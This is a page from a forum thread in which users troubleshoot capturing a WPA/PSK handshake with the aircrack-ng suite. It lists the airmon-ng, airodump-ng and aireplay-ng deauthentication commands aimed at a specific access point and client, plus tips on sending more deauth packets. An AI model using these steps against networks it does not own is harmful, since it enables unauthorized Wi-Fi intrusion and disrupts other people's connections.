Page 3 of 3 FirstFirst 123

Thread: Help with WPA/PSK

Quote Originally Posted by LMNOParis View Post
    again, what command are you using to run the crack? if you have the handshake, and you have the .cap file, you should be set to run the crack. what exactly do you put following aircrack-ng......?
    The name of the capture file, obviously.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

Quote Originally Posted by theprez98 View Post
    The name of the capture file, obviously.
    yes. i was saying the file itself because if he already has a cap file i don't know why injection matters at that point.

Just burned his ISO

But without getting HANDSHAKE can i proceed to the next step?

I. Change device to Monitor Mode:

1) airmon-ng stop eth1

2) airmon-ng start eth1

(monitor mode enabled)

3) airodump-ng eth1

4) After you see your network and clients hit CTRL + C but leave window open

5) Open New shell window

6) airodump-ng -c 11 -w psk --bssid 00:1E:40:53:XX:XX eth1

III. Deauth the wireless client

7) aireplay-ng -0 1 -a 00:1E:40:53:XX:XX -c 00:13:F7:27:XX:XX eth1

the whole problem starts here i have even tried the above command with 3 and 5 ATTEMPT but same result alwayz

Sending DeAuth to station -- STMAC : [[BSSID_CLIENT]]

but no handshake .As i have reinstalled the BT3 you know but on the old instaltion i was getting handshakes but no passphrase found problem was there even passphrase was there for now i am just messing with HANDSHAKE

ah boy. you do not need a handshake for any of that, as you are doing that to GET a handshake. as far as the deauth goes, try 10, or 15..... make sure the other attached wireless device is connected properly. other than that, i don't know why you aren't getting the handshake. i get it with 2 deauth attempts since everything is so close to me.

Since your problem seems to be deAuthing the client have you attempted to simply capture the handshake without performing this step? As you surely are aware, deauthenticating the client is not a mandatory step and you can simply capture the handshake when the client manually connects to the WAP.

I am not suggesting this as a solution, but rather as a workaround and possibly a step in the right direction. Could you also kindly provide the exact make/model of your wireless chipset as I can't see it mentioned in any of your earlier posts in this thread.
    -Monkeys are like nature's humans.

Just burned his ISO

Thanx for the effort mate i will try all possible things and report you back :-(

Page 3 of 3 FirstFirst 123